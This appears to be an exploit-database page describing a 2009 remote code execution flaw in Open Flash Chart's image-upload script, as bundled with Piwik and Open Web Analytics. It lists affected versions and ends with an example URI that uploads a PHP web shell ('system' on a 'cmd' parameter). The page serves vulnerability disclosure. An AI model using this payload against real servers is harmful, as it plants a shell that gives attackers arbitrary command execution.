[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Piwik Open Flash Chart Remote Code Execution Vulnerability

Author
Braeden Thomas
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10301
Category
web applications
Date add
17-12-2009
Platform
unsorted
==========================================================
Piwik Open Flash Chart Remote Code Execution Vulnerability
==========================================================

Class:  Input Validation Error
CVE:   
Remote:     Yes
Local:  No
Published:  Dec 14 2009 12:00AM
Updated:    Dec 17 2009 06:03PM
Credit:     Braeden Thomas
Vulnerable:     Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0
 
 
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
 
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
 
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected.
 
The following example URI is available:
 
http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> 



#  0day.today [2024-12-24]  #